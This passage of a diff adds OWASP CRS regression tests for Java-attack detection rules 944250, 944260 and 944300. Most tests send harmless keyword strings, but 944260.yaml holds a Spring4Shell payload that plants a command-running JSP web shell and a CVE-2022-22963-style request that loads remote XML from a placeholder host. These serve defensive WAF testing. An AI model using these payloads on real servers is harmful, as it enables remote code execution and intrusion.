@@ -0,0 +1,431 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944250.yaml" + description: "Positive tests for rule 944250" +tests: + - test_title: 944250-1 + desc: "Argument test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-2 + desc: "Argument name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-3 + desc: "Cookie test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-4 + desc: "Cookie name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-5 + desc: "Request header test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-6 + desc: "XML attribute value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-7 + desc: "XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-8 + desc: "Nested XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-9 + desc: "Content-Type text/plain includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-10 + desc: "Content-Type application/json arg value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-11 + desc: "Content-Type application/json arg name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-12 + desc: "Argument test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-13 + desc: "Argument name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-14 + desc: "Cookie test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-15 + desc: "Cookie name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-16 + desc: "Request header test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-17 + desc: "XML attribute value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-18 + desc: "XML element value 
includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-19 + desc: "Nested XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-20 + desc: "Content-Type text/plain includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-21 + desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-22 + desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log_contains: "id \"944250\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml new file mode 100644 index 00000000..664061d1 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml 
@@ -0,0 +1,39 @@ +--- +meta: + author: "theMiddle" + enabled: true + name: "944260.yaml" + description: "Positive tests for rule 944260" +tests: + - test_title: 944260-1 + desc: "CVE-2022-22963" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.1" + data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" + output: + log_contains: "id \"944260\"" + - test_title: 944260-2 + desc: "Spring Framework RCE" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.1" + data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" + output: + log_contains: "id \"944260\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml new file mode 100644 index 00000000..4106730f --- /dev/null 
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml 
@@ -0,0 +1,6367 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944300.yaml" + description: "Positive tests for rule 944300" +tests: + - test_title: 944300-1 + desc: "Argument test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-2 + desc: "Argument name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-3 + desc: "Cookie test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-4 + desc: "Cookie name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-5 + desc: "Request header test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-6 + desc: "XML attribute value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-7 + desc: "XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + 
output: + log_contains: "id \"944300\"" + - test_title: 944300-8 + desc: "Nested XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-9 + desc: "Content-Type text/plain includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-10 + desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-11 + desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-12 + desc: "Argument test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-13 + desc: "Argument name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-14 + desc: "Cookie test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id 
\"944300\"" + - test_title: 944300-15 + desc: "Cookie name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-16 + desc: "Request header test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-17 + desc: "XML attribute value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-18 + desc: "XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-19 + desc: "Nested XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-20 + desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-21 + desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-22 + desc: 
"Content-Type application/json arg name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-23 + desc: "Argument test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-24 + desc: "Argument name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-25 + desc: "Cookie test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" 
+ Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-26 + desc: "Cookie name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-27 + desc: "Request header test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 